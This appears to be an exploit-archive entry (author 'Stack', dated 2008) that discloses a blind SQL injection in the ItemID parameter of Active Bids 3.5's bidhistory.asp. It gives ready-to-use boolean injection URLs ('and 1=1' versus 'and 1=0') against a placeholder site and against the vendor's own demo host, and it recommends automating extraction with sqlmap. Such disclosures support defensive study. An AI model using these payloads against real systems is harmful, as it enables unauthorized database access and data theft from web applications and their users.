id: 4311
date: 11/29/2008
title: Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability
author: Stack
cves: 

==========================================================
Active Bids 3.5 (ItemID) Blind SQL Injection Vulnerability 
==========================================================


 [~]Tybe     : Remote Blind SQL Injection Vulnerability
   
 [~]Vendor   : www.activewebsoftwares.com
   
 [~]Software : Active Bids



http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=1

http://site.il/activebids/bidhistory.asp?ItemID=354%20and%201=0

Demo :

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=1

http://www.activewebsoftwares.com/demoactivebids/bidhistory.asp?ItemID=354%20and%201=0


# you can exploting the bug white blind sql automatic toolz such as sqlmap or ...



#  0day.today [2023-03-24]  #